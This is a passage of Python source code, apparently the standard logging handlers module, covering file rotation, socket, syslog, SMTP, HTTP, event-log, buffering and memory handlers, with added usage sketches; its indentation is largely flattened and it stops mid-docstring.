# If we are rolling over on a certain day, add in the number of days until
# the next rollover, but offset by 1 since we just calculated the time
# until the next day starts. There are three cases:
# Case 1) The day to rollover is today; in this case, do nothing
# Case 2) The day to rollover is further in the interval (i.e., today is
# day 2 (Wednesday) and rollover is on day 6 (Sunday). Days to
# next rollover is simply 6 - 2 - 1, or 3.
# Case 3) The day to rollover is behind us in the interval (i.e., today
# is day 5 (Saturday) and rollover is on day 3 (Thursday).
# Days to rollover is 6 - 5 + 3, or 4. In this case, it's the
# number of days left in the current week (1) plus the number
# of days in the next week until the rollover day (3).
# The calculations described in 2) and 3) above need to have a day added.
# This is because the above time calculation takes us to midnight on this
# day, i.e. the start of the next day.
if self.when.startswith('W'):
day = currentDay # 0 is Monday
if day != self.dayOfWeek:
if day < self.dayOfWeek:
daysToWait = self.dayOfWeek - day
else:
daysToWait = 6 - day + self.dayOfWeek + 1
newRolloverAt = result + (daysToWait * (60 * 60 * 24))
if not self.utc:
dstNow = t[-1]
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
result = newRolloverAt
return result
def shouldRollover(self, record):
"""
Determine if rollover should occur.
record is not used, as we are just comparing times, but it is needed so
the method signatures are the same
"""
t = int(time.time())
if t >= self.rolloverAt:
return 1
return 0
def getFilesToDelete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dirName, baseName = os.path.split(self.baseFilename)
fileNames = os.listdir(dirName)
result = []
prefix = baseName + "."
plen = len(prefix)
for fileName in fileNames:
if fileName[:plen] == prefix:
suffix = fileName[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirName, fileName))
if len(result) < self.backupCount:
result = []
else:
result.sort()
result = result[:len(result) - self.backupCount]
return result
def doRollover(self):
"""
do a rollover; in this case, a date/time stamp is appended to the filename
when the rollover happens. However, you want the file to be named for the
start of the interval, not the current time. If there is a backup count,
then we have to get a list of matching filenames, sort them and remove
the one with the oldest suffix.
"""
if self.stream:
self.stream.close()
self.stream = None
# get the time that this sequence started at and make it a TimeTuple
currentTime = int(time.time())
dstNow = time.localtime(currentTime)[-1]
t = self.rolloverAt - self.interval
if self.utc:
timeTuple = time.gmtime(t)
else:
timeTuple = time.localtime(t)
dstThen = timeTuple[-1]
if dstNow != dstThen:
if dstNow:
addend = 3600
else:
addend = -3600
timeTuple = time.localtime(t + addend)
dfn = self.rotation_filename(self.baseFilename + "." +
time.strftime(self.suffix, timeTuple))
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if self.backupCount > 0:
for s in self.getFilesToDelete():
os.remove(s)
if not self.delay:
self.stream = self._open()
newRolloverAt = self.computeRollover(currentTime)
while newRolloverAt <= currentTime:
newRolloverAt = newRolloverAt + self.interval
#If DST changes and midnight or weekly rollover, adjust for this.
if (self.when == 'MIDNIGHT' or self.when.startswith('W')) and not self.utc:
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
self.rolloverAt = newRolloverAt
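# A minimal usage sketch of the timed rollover options listed in __init__ above:
# rotate at midnight keeping a week of backups, or rotate weekly on Sunday (W6).
def _example_timed_logging(path="timed.log"):
    logger = logging.getLogger("example.timed")
    nightly = TimedRotatingFileHandler(path, when="midnight", backupCount=7)
    weekly = TimedRotatingFileHandler(path + ".weekly", when="W6", backupCount=4)
    logger.addHandler(nightly)
    logger.addHandler(weekly)
    logger.setLevel(logging.INFO)
    return logger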
class WatchedFileHandler(logging.FileHandler):
"""
A handler for logging to a file, which watches the file
to see if it has changed while in use. This can happen because of
usage of programs such as newsyslog and logrotate which perform
log file rotation. This handler, intended for use under Unix,
watches the file to see if it has changed since the last emit.
(A file has changed if its device or inode have changed.)
If it has changed, the old file stream is closed, and the file
opened to get a new stream.
This handler is not appropriate for use under Windows, because
under Windows open files cannot be moved or renamed - logging
opens the files with exclusive locks - and so there is no need
for such a handler. Furthermore, ST_INO is not supported under
Windows; stat always returns zero for this value.
This handler is based on a suggestion and patch by Chad J.
Schroeder.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False):
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.dev, self.ino = -1, -1
self._statstream()
def _statstream(self):
if self.stream:
sres = os.fstat(self.stream.fileno())
self.dev, self.ino = sres[ST_DEV], sres[ST_INO]
def reopenIfNeeded(self):
"""
Reopen log file if needed.
Checks if the underlying file has changed, and if it
has, close the old stream and reopen the file to get the
current stream.
"""
# Reduce the chance of race conditions by stat'ing by path only
# once and then fstat'ing our new fd if we opened a new log stream.
# See issue #14632: Thanks to John Mulligan for the problem report
# and patch.
try:
# stat the file by path, checking for existence
sres = os.stat(self.baseFilename)
except FileNotFoundError:
sres = None
# compare file system stat with that of our stream file handle
if not sres or sres[ST_DEV] != self.dev or sres[ST_INO] != self.ino:
if self.stream is not None:
# we have an open file handle, clean it up
self.stream.flush()
self.stream.close()
self.stream = None # See Issue #21742: _open () might fail.
# open a new file handle and get new stat info from that fd
self.stream = self._open()
self._statstream()
def emit(self, record):
"""
Emit a record.
If underlying file has changed, reopen the file before emitting the
record to it.
"""
self.reopenIfNeeded()
logging.FileHandler.emit(self, record)
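# A minimal usage sketch for the logrotate/newsyslog scenario described in the
# class docstring above; the log path is only an example.
def _example_watched_logging(path="/var/log/myapp.log"):
    logger = logging.getLogger("example.watched")
    logger.addHandler(WatchedFileHandler(path))
    logger.setLevel(logging.INFO)
    return logger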
class SocketHandler(logging.Handler):
"""
A handler class which writes logging records, in pickle format, to
a streaming socket. The socket is kept open across logging calls.
If the peer resets it, an attempt is made to reconnect on the next call.
The pickle which is sent is that of the LogRecord's attribute dictionary
(__dict__), so that the receiver does not need to have the logging module
installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
When the attribute *closeOnError* is set to True - if a socket error
occurs, the socket is silently closed and then reopened on the next
logging call.
"""
logging.Handler.__init__(self)
self.host = host
self.port = port
if port is None:
self.address = host
else:
self.address = (host, port)
self.sock = None
self.closeOnError = False
self.retryTime = None
#
# Exponential backoff parameters.
#
self.retryStart = 1.0
self.retryMax = 30.0
self.retryFactor = 2.0
def makeSocket(self, timeout=1):
"""
A factory method which allows subclasses to define the precise
type of socket they want.
"""
if self.port is not None:
result = socket.create_connection(self.address, timeout=timeout)
else:
result = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
result.settimeout(timeout)
try:
result.connect(self.address)
except OSError:
result.close() # Issue 19182
raise
return result
def createSocket(self):
"""
Try to create a socket, using an exponential backoff with
a max retry time. Thanks to Robert Olson for the original patch
(SF #815911) which has been slightly refactored.
"""
now = time.time()
# Either retryTime is None, in which case this
# is the first time back after a disconnect, or
# we've waited long enough.
if self.retryTime is None:
attempt = True
else:
attempt = (now >= self.retryTime)
if attempt:
try:
self.sock = self.makeSocket()
self.retryTime = None # next time, no delay before trying
except OSError:
#Creation failed, so set the retry time and return.
if self.retryTime is None:
self.retryPeriod = self.retryStart
else:
self.retryPeriod = self.retryPeriod * self.retryFactor
if self.retryPeriod > self.retryMax:
self.retryPeriod = self.retryMax
self.retryTime = now + self.retryPeriod
def send(self, s):
"""
Send a pickled string to the socket.
This function allows for partial sends which can happen when the
network is busy.
"""
if self.sock is None:
self.createSocket()
#self.sock can be None either because we haven't reached the retry
#time yet, or because we have reached the retry time and retried,
#but are still unable to connect.
if self.sock:
try:
self.sock.sendall(s)
except OSError: #pragma: no cover
self.sock.close()
self.sock = None # so we can call createSocket next time
def makePickle(self, record):
"""
Pickles the record in binary format with a length prefix, and
returns it ready for transmission across the socket.
"""
ei = record.exc_info
if ei:
# just to get traceback text into record.exc_text ...
dummy = self.format(record)
# See issue #14436: If msg or args are objects, they may not be
# available on the receiving end. So we convert the msg % args
# to a string, save it as msg and zap the args.
d = dict(record.__dict__)
d['msg'] = record.getMessage()
d['args'] = None
d['exc_info'] = None
# Issue #25685: delete 'message' if present: redundant with 'msg'
d.pop('message', None)
s = pickle.dumps(d, 1)
slen = struct.pack(">L", len(s))
return slen + s
def handleError(self, record):
"""
Handle an error during logging.
An error has occurred during logging. Most likely cause -
connection lost. Close the socket so that we can retry on the
next event.
"""
if self.closeOnError and self.sock:
self.sock.close()
self.sock = None #try to reconnect next time
else:
logging.Handler.handleError(self, record)
def emit(self, record):
"""
Emit a record.
Pickles the record and writes it to the socket in binary format.
If there is an error with the socket, silently drop the packet.
If there was a problem with the socket, re-establishes the
socket.
"""
try:
s = self.makePickle(record)
self.send(s)
except Exception:
self.handleError(record)
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
sock = self.sock
if sock:
self.sock = None
sock.close()
logging.Handler.close(self)
finally:
self.release()
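# A minimal sketch of the receiving side of the wire format produced by
# makePickle() above: a 4-byte big-endian length prefix followed by the pickled
# LogRecord attribute dict, rebuilt here with logging.makeLogRecord(). The
# host/port defaults are only examples.
def _example_socket_log_receiver(host="localhost", port=DEFAULT_TCP_LOGGING_PORT):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((host, port))
    server.listen(1)
    conn, _ = server.accept()
    try:
        while True:
            header = conn.recv(4)
            if len(header) < 4:
                break
            (length,) = struct.unpack(">L", header)
            payload = b""
            while len(payload) < length:
                chunk = conn.recv(length - len(payload))
                if not chunk:
                    return
                payload += chunk
            record = logging.makeLogRecord(pickle.loads(payload))
            logging.getLogger(record.name).handle(record)
    finally:
        conn.close()
        server.close()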
class DatagramHandler(SocketHandler):
"""
A handler class which writes logging records, in pickle format, to
a datagram socket. The pickle which is sent is that of the LogRecord's
attribute dictionary (__dict__), so that the receiver does not need to
have the logging module installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
"""
SocketHandler.__init__(self, host, port)
self.closeOnError = False
def makeSocket(self):
"""
The factory method of SocketHandler is here overridden to create
a UDP socket (SOCK_DGRAM).
"""
if self.port is None:
family = socket.AF_UNIX
else:
family = socket.AF_INET
s = socket.socket(family, socket.SOCK_DGRAM)
return s
def send(self, s):
"""
Send a pickled string to a socket.
This function no longer allows for partial sends which can happen
when the network is busy - UDP does not guarantee delivery and
can deliver packets out of sequence.
"""
if self.sock is None:
self.createSocket()
self.sock.sendto(s, self.address)
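# A minimal sketch of receiving DatagramHandler output: each UDP datagram holds
# the same length-prefixed pickle produced by makePickle(), so the first 4 bytes
# can simply be skipped before unpickling. The host/port defaults are examples.
def _example_datagram_log_receiver(host="localhost", port=DEFAULT_UDP_LOGGING_PORT):
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((host, port))
    try:
        while True:
            data, _ = sock.recvfrom(65535)
            record = logging.makeLogRecord(pickle.loads(data[4:]))
            logging.getLogger(record.name).handle(record)
    finally:
        sock.close()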
class SysLogHandler(logging.Handler):
"""
A handler class which sends formatted logging records to a syslog
server. Based on Sam Rushing's syslog module:
http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Contributed by Nicolas Untz (after which minor refactoring changes
have been made).
"""
# from <linux/sys/syslog.h>:
# ======================================================================
# priorities/facilities are encoded into a single 32-bit quantity, where
# the bottom 3 bits are the priority (0-7) and the top 28 bits are the
# facility (0-big number). Both the priorities and the facilities map
# roughly one-to-one to strings in the syslogd(8) source code. This
# mapping is included in this file.
#
# priorities (these are ordered)
LOG_EMERG = 0 # system is unusable
LOG_ALERT = 1 # action must be taken immediately
LOG_CRIT = 2 # critical conditions
LOG_ERR = 3 # error conditions
LOG_WARNING = 4 # warning conditions
LOG_NOTICE = 5 # normal but significant condition
LOG_INFO = 6 # informational
LOG_DEBUG = 7 # debug-level messages
# facility codes
LOG_KERN = 0 # kernel messages
LOG_USER = 1 # random user-level messages
LOG_MAIL = 2 # mail system
LOG_DAEMON = 3 # system daemons
LOG_AUTH = 4 # security/authorization messages
LOG_SYSLOG = 5 # messages generated internally by syslogd
LOG_LPR = 6 # line printer subsystem
LOG_NEWS = 7 # network news subsystem
LOG_UUCP = 8 # UUCP subsystem
LOG_CRON = 9 # clock daemon
LOG_AUTHPRIV = 10 # security/authorization messages (private)
LOG_FTP = 11 # FTP daemon
# other codes through 15 reserved for system use
LOG_LOCAL0 = 16 # reserved for local use
LOG_LOCAL1 = 17 # reserved for local use
LOG_LOCAL2 = 18 # reserved for local use
LOG_LOCAL3 = 19 # reserved for local use
LOG_LOCAL4 = 20 # reserved for local use
LOG_LOCAL5 = 21 # reserved for local use
LOG_LOCAL6 = 22 # reserved for local use
LOG_LOCAL7 = 23 # reserved for local use
priority_names = {
"alert": LOG_ALERT,
"crit": LOG_CRIT,
"critical": LOG_CRIT,
"debug": LOG_DEBUG,
"emerg": LOG_EMERG,
"err": LOG_ERR,
"error": LOG_ERR, # DEPRECATED
"info": LOG_INFO,
"notice": LOG_NOTICE,
"panic": LOG_EMERG, # DEPRECATED
"warn": LOG_WARNING, # DEPRECATED
"warning": LOG_WARNING,
}
facility_names = {
"auth": LOG_AUTH,
"authpriv": LOG_AUTHPRIV,
"cron": LOG_CRON,
"daemon": LOG_DAEMON,
"ftp": LOG_FTP,
"kern": LOG_KERN,
"lpr": LOG_LPR,
"mail": LOG_MAIL,
"news": LOG_NEWS,
"security": LOG_AUTH, # DEPRECATED
"syslog": LOG_SYSLOG,
"user": LOG_USER,
"uucp": LOG_UUCP,
"local0": LOG_LOCAL0,
"local1": LOG_LOCAL1,
"local2": LOG_LOCAL2,
"local3": LOG_LOCAL3,
"local4": LOG_LOCAL4,
"local5": LOG_LOCAL5,
"local6": LOG_LOCAL6,
"local7": LOG_LOCAL7,
}
#The map below appears to be trivially lowercasing the key. However,
#there's more to it than meets the eye - in some locales, lowercasing
#gives unexpected results. See SF #1524081: in the Turkish locale,
#"INFO".lower() != "info"
priority_map = {
"DEBUG" : "debug",
"INFO" : "info",
"WARNING" : "warning",
"ERROR" : "error",
"CRITICAL" : "critical"
}
def __init__(self, address=('localhost', SYSLOG_UDP_PORT),
facility=LOG_USER, socktype=None):
"""
Initialize a handler.
If address is specified as a string, a UNIX socket is used. To log to a
local syslogd, "SysLogHandler(address="/dev/log")" can be used.
If facility is not specified, LOG_USER is used. If socktype is
specified as socket.SOCK_DGRAM or socket.SOCK_STREAM, that specific
socket type will be used. For Unix sockets, you can also specify a
socktype of None, in which case socket.SOCK_DGRAM will be used, falling
back to socket.SOCK_STREAM.
"""
logging.Handler.__init__(self)
self.address = address
self.facility = facility
self.socktype = socktype
if isinstance(address, str):
self.unixsocket = True
# Syslog server may be unavailable during handler initialisation.
# C's openlog() function also ignores connection errors.
            # Moreover, we ignore these errors while logging, so it is not worse
            # to ignore them here as well.
try:
self._connect_unixsocket(address)
except OSError:
pass
else:
self.unixsocket = False
if socktype is None:
socktype = socket.SOCK_DGRAM
host, port = address
ress = socket.getaddrinfo(host, port, 0, socktype)
if not ress:
raise OSError("getaddrinfo returns an empty list")
for res in ress:
af, socktype, proto, _, sa = res
err = sock = None
try:
sock = socket.socket(af, socktype, proto)
if socktype == socket.SOCK_STREAM:
sock.connect(sa)
break
except OSError as exc:
err = exc
if sock is not None:
sock.close()
if err is not None:
raise err
self.socket = sock
self.socktype = socktype
def _connect_unixsocket(self, address):
use_socktype = self.socktype
if use_socktype is None:
use_socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
if self.socktype is not None:
# user didn't specify falling back, so fail
raise
use_socktype = socket.SOCK_STREAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
raise
def encodePriority(self, facility, priority):
"""
Encode the facility and priority. You can pass in strings or
integers - if strings are passed, the facility_names and
priority_names mapping dictionaries are used to convert them to
integers.
"""
if isinstance(facility, str):
facility = self.facility_names[facility]
if isinstance(priority, str):
priority = self.priority_names[priority]
return (facility << 3) | priority
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
self.socket.close()
logging.Handler.close(self)
finally:
self.release()
def mapPriority(self, levelName):
"""
Map a logging level name to a key in the priority_names map.
This is useful in two scenarios: when custom levels are being
used, and in the case where you can't do a straightforward
mapping by lowercasing the logging level name because of locale-
specific issues (see SF #1524081).
"""
return self.priority_map.get(levelName, "warning")
ident = '' # prepended to all messages
append_nul = True # some old syslog daemons expect a NUL terminator
def emit(self, record):
"""
Emit a record.
The record is formatted, and then sent to the syslog server. If
exception information is present, it is NOT sent to the server.
"""
try:
msg = self.format(record)
if self.ident:
msg = self.ident + msg
if self.append_nul:
msg += '\000'
# We need to convert record level to lowercase, maybe this will
# change in the future.
prio = '<%d>' % self.encodePriority(self.facility,
self.mapPriority(record.levelname))
prio = prio.encode('utf-8')
# Message is a string. Convert to bytes as required by RFC 5424
msg = msg.encode('utf-8')
msg = prio + msg
if self.unixsocket:
try:
self.socket.send(msg)
except OSError:
self.socket.close()
self._connect_unixsocket(self.address)
self.socket.send(msg)
elif self.socktype == socket.SOCK_DGRAM:
self.socket.sendto(msg, self.address)
else:
self.socket.sendall(msg)
except Exception:
self.handleError(record)
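# A minimal usage sketch of the facility/priority encoding above: the PRI value
# is (facility << 3) | priority, and the handler can talk either to a local
# syslog socket or to a remote UDP server. The addresses are only examples.
def _example_syslog_logging():
    # LOG_LOCAL0 + LOG_INFO -> PRI 134, i.e. '<134>' on the wire.
    assert (SysLogHandler.LOG_LOCAL0 << 3) | SysLogHandler.LOG_INFO == 134
    local = SysLogHandler(address="/dev/log", facility=SysLogHandler.LOG_LOCAL0)
    remote = SysLogHandler(address=("logs.example.com", SYSLOG_UDP_PORT))
    logger = logging.getLogger("example.syslog")
    logger.addHandler(local)
    logger.addHandler(remote)
    return logger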
class SMTPHandler(logging.Handler):
"""
A handler class which sends an SMTP email for each logging event.
"""
def __init__(self, mailhost, fromaddr, toaddrs, subject,
credentials=None, secure=None, timeout=5.0):
"""
Initialize the handler.
Initialize the instance with the from and to addresses and subject
line of the email. To specify a non-standard SMTP port, use the
(host, port) tuple format for the mailhost argument. To specify
authentication credentials, supply a (username, password) tuple
for the credentials argument. To specify the use of a secure
protocol (TLS), pass in a tuple for the secure argument. This will
only be used when authentication credentials are supplied. The tuple
will be either an empty tuple, or a single-value tuple with the name
of a keyfile, or a 2-value tuple with the names of the keyfile and
certificate file. (This tuple is passed to the `starttls` method).
        A timeout in seconds can be specified for the SMTP connection (the
        default is 5 seconds, matching the timeout parameter).
"""
logging.Handler.__init__(self)
if isinstance(mailhost, (list, tuple)):
self.mailhost, self.mailport = mailhost
else:
self.mailhost, self.mailport = mailhost, None
if isinstance(credentials, (list, tuple)):
self.username, self.password = credentials
else:
self.username = None
self.fromaddr = fromaddr
if isinstance(toaddrs, str):
toaddrs = [toaddrs]
self.toaddrs = toaddrs
self.subject = subject
self.secure = secure
self.timeout = timeout
def getSubject(self, record):
"""
Determine the subject for the email.
If you want to specify a subject line which is record-dependent,
override this method.
"""
return self.subject
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
"""
try:
import smtplib
from email.message import EmailMessage
import email.utils
port = self.mailport
if not port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
msg = EmailMessage()
msg['From'] = self.fromaddr
msg['To'] = ','.join(self.toaddrs)
msg['Subject'] = self.getSubject(record)
msg['Date'] = email.utils.localtime()
msg.set_content(self.format(record))
if self.username:
if self.secure is not None:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.send_message(msg)
smtp.quit()
except Exception:
self.handleError(record)
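# A minimal usage sketch (host names, addresses and credentials below are placeholders,
# not values from this module): build an SMTPHandler using the (host, port) mailhost
# form, a (username, password) credentials tuple and an empty tuple for `secure` to
# request a plain starttls() upgrade, then attach it so ERROR records are mailed out.
def _example_smtp_logging():
    import logging
    handler = SMTPHandler(
        mailhost=('smtp.example.com', 587),
        fromaddr='app@example.com',
        toaddrs=['ops@example.com'],
        subject='Application error',
        credentials=('app-user', 'app-password'),
        secure=())                      # empty tuple -> starttls() with no keyfile/cert
    handler.setLevel(logging.ERROR)
    logging.getLogger('example.app').addHandler(handler)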
class NTEventLogHandler(logging.Handler):
"""
A handler class which sends events to the NT Event Log. Adds a
registry entry for the specified application name. If no dllname is
provided, win32service.pyd (which contains some basic message
placeholders) is used. Note that use of these placeholders will make
your event logs big, as the entire message source is held in the log.
If you want slimmer logs, you have to pass in the name of your own DLL
which contains the message definitions you want to use in the event log.
"""
def __init__(self, appname, dllname=None, logtype="Application"):
logging.Handler.__init__(self)
try:
import win32evtlogutil, win32evtlog
self.appname = appname
self._welu = win32evtlogutil
if not dllname:
dllname = os.path.split(self._welu.__file__)
dllname = os.path.split(dllname[0])
dllname = os.path.join(dllname[0], r'win32service.pyd')
self.dllname = dllname
self.logtype = logtype
self._welu.AddSourceToRegistry(appname, dllname, logtype)
self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
self.typemap = {
logging.DEBUG : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.INFO : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.WARNING : win32evtlog.EVENTLOG_WARNING_TYPE,
logging.ERROR : win32evtlog.EVENTLOG_ERROR_TYPE,
logging.CRITICAL: win32evtlog.EVENTLOG_ERROR_TYPE,
}
except ImportError:
print("The Python Win32 extensions for NT (service, event "\
"logging) appear not to be available.")
self._welu = None
def getMessageID(self, record):
"""
Return the message ID for the event record. If you are using your
own messages, you could do this by having the msg passed to the
logger being an ID rather than a formatting string. Then, in here,
you could use a dictionary lookup to get the message ID. This
version returns 1, which is the base message ID in win32service.pyd.
"""
return 1
def getEventCategory(self, record):
"""
Return the event category for the record.
Override this if you want to specify your own categories. This version
returns 0.
"""
return 0
def getEventType(self, record):
"""
Return the event type for the record.
Override this if you want to specify your own types. This version does
a mapping using the handler's typemap attribute, which is set up in
__init__() to a dictionary which contains mappings for DEBUG, INFO,
WARNING, ERROR and CRITICAL. If you are using your own levels you will
either need to override this method or place a suitable dictionary in
the handler's typemap attribute.
"""
return self.typemap.get(record.levelno, self.deftype)
def emit(self, record):
"""
Emit a record.
Determine the message ID, event category and event type. Then
log the message in the NT event log.
"""
if self._welu:
try:
id = self.getMessageID(record)
cat = self.getEventCategory(record)
type = self.getEventType(record)
msg = self.format(record)
self._welu.ReportEvent(self.appname, id, cat, type, [msg])
except Exception:
self.handleError(record)
def close(self):
"""
Clean up this handler.
You can remove the application name from the registry as a
source of event log entries. However, if you do this, you will
not be able to see the events as you intended in the Event Log
Viewer - it needs to be able to access the registry to get the
DLL name.
"""
#self._welu.RemoveSourceFromRegistry(self.appname, self.logtype)
logging.Handler.close(self)
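# A minimal usage sketch (the application name is a placeholder): on Windows, attaching
# an NTEventLogHandler routes WARNING and above into the NT Event Log under the given
# source name; on systems without the Win32 extensions the constructor only prints a
# notice and the handler emits nothing.
def _example_nt_event_logging():
    import logging
    handler = NTEventLogHandler('MyExampleApp')
    handler.setLevel(logging.WARNING)
    logging.getLogger('example.app').addHandler(handler)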
class HTTPHandler(logging.Handler):
"""
A class which sends records to a Web server, using either GET or
POST semantics.
"""
def __init__(self, host, url, method="GET", secure=False, credentials=None,
context=None):
"""
Initialize the instance with the host, the request URL, and the method
("GET" or "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
if method not in ["GET", "POST"]:
raise ValueError("method must be GET or POST")
if not secure and context is not None:
raise ValueError("context parameter only makes sense "
"with secure=True")
self.host = host
self.url = url
self.method = method
self.secure = secure
self.credentials = credentials
self.context = context
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
that is sent as the CGI data. Overwrite in your class.
Contributed by Franz Glasner.
"""
return record.__dict__
def emit(self, record):
"""
Emit a record.
Send the record to the Web server as a percent-encoded dictionary
"""
try:
import http.client, urllib.parse
host = self.host
if self.secure:
h = http.client.HTTPSConnection(host, context=self.context)
else:
h = http.client.HTTPConnection(host)
url = self.url
data = urllib.parse.urlencode(self.mapLogRecord(record))
if self.method == "GET":
if (url.find('?') >= 0):
sep = '&'
else:
sep = '?'
url = url + "%c%s" % (sep, data)
h.putrequest(self.method, url)
# support multiple hosts on one IP address...
# need to strip optional :port from host, if present
i = host.find(":")
if i >= 0:
host = host[:i]
# See issue #30904: putrequest call above already adds this header
# on Python 3.x.
# h.putheader("Host", host)
if self.method == "POST":
h.putheader("Content-type",
"application/x-www-form-urlencoded")
h.putheader("Content-length", str(len(data)))
if self.credentials:
import base64
s = ('%s:%s' % self.credentials).encode('utf-8')
s = 'Basic ' + base64.b64encode(s).strip().decode('ascii')
h.putheader('Authorization', s)
h.endheaders()
if self.method == "POST":
h.send(data.encode('utf-8'))
h.getresponse() #can't do anything with the result
except Exception:
self.handleError(record)
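# A minimal usage sketch (host and URL are placeholders): each record is sent to a web
# endpoint as a percent-encoded form. With method='POST' the dict from mapLogRecord()
# goes in the request body; with 'GET' it is appended to the query string.
def _example_http_logging():
    import logging
    handler = HTTPHandler('logs.example.com:8080', '/log', method='POST')
    logging.getLogger('example.app').addHandler(handler)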
class BufferingHandler(logging.Handler):
"""
A handler class which buffers logging records in memory. Whenever each
record is added to the buffer, a check is made to see if the buffer should
be flushed. If it should, then flush() is expected to do what's needed.
"""
def __init__(self, capacity):
"""
Initialize the handler with the buffer size.
"""
logging.Handler.__init__(self)
self.capacity = capacity
self.buffer = []
def shouldFlush(self, record):
"""
Should the handler flush its buffer?
Returns true if the buffer is up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
return (len(self.buffer) >= self.capacity)
def emit(self, record):
"""
Emit a record.
Append the record. If shouldFlush() tells us to, call flush() to process
the buffer.
"""
self.buffer.append(record)
if self.shouldFlush(record):
self.flush()
def flush(self):
"""
Override to implement custom flushing behaviour.
This version just zaps the buffer to empty.
"""
self.acquire()
try:
self.buffer = []
finally:
self.release()
def close(self):
"""
Close the handler.
This version just flushes and chains to the parent class' close().
"""
try:
self.flush()
finally:
logging.Handler.close(self)
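# A sketch of the kind of custom flushing strategy that shouldFlush() is meant to
# support (this subclass is illustrative and not part of the module): flush when the
# buffer fills up or when a fixed number of seconds has passed since the last flush,
# whichever comes first. Delivery of the buffered records is left to further
# subclassing, as MemoryHandler below does.
import time as _time
class _IntervalBufferingHandler(BufferingHandler):
    def __init__(self, capacity, interval=30.0):
        BufferingHandler.__init__(self, capacity)
        self.interval = interval
        self._last_flush = _time.time()
    def shouldFlush(self, record):
        # Flush on a full buffer or on a stale one.
        return (len(self.buffer) >= self.capacity or
                _time.time() - self._last_flush >= self.interval)
    def flush(self):
        self._last_flush = _time.time()
        BufferingHandler.flush(self)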
class MemoryHandler(BufferingHandler):
"""
A handler class which buffers logging records in memory, periodically
flushing them to a target handler. Flushing occurs whenever the buffer
is full, or when an event of a certain severity or greater is seen.
"""
def __init__(self, capacity, flushLevel=logging.ERROR, target=None,
flushOnClose=True):
"""
Initialize the handler with the buffer size, the level at which
flushing should occur and an optional target.
Note that without a target being set either here or via setTarget(),
a MemoryHandler is no use to anyone!
The ``flushOnClose`` argument is ``True`` for backward compatibility
reasons - the old behaviour is that when the handler is closed, the
buffer is flushed, even if the flush level hasn't been exceeded nor the
capacity exceeded. To prevent this, set ``flushOnClose`` to ``False``.
"""
BufferingHandler.__init__(self, capacity)
self.flushLevel = flushLevel
self.target = target
# See Issue #26559 for why this has been added
self.flushOnClose = flushOnClose
def shouldFlush(self, record):
"""
Check for buffer full or a record at the flushLevel or higher.
"""
return (len(self.buffer) >= self.capacity) or \
(record.levelno >= self.flushLevel)
def setTarget(self, target):
"""
Set the target handler for this handler.
"""
self.target = target
def flush(self):
"""
For a MemoryHandler, flushing means just sending the buffered
records to the target, if there is one. Override if you want
different behaviour.
The record buffer is also cleared by this operation.
"""
self.acquire()
try:
if self.target:
for record in self.buffer:
self.target.handle(record)
self.buffer = []
finally:
self.release()
def close(self):
"""
Flush, if appropriately configured, set the target to None and lose the
buffer.
"""
try:
if self.flushOnClose:
self.flush()
finally:
self.acquire()
try:
self.target = None
BufferingHandler.close(self)
finally:
self.release()
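# A minimal usage sketch (the file name is a placeholder): buffer up to 200 records in
# memory and only write them to the target file once an ERROR (or worse) arrives, which
# preserves the surrounding DEBUG context without constantly hitting disk.
def _example_memory_logging():
    import logging
    target = logging.FileHandler('example-app.log')
    handler = MemoryHandler(capacity=200, flushLevel=logging.ERROR, target=target)
    logger = logging.getLogger('example.app')
    logger.addHandler(handler)
    logger.setLevel(logging.DEBUG)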
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy pasted into
user code for use with earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
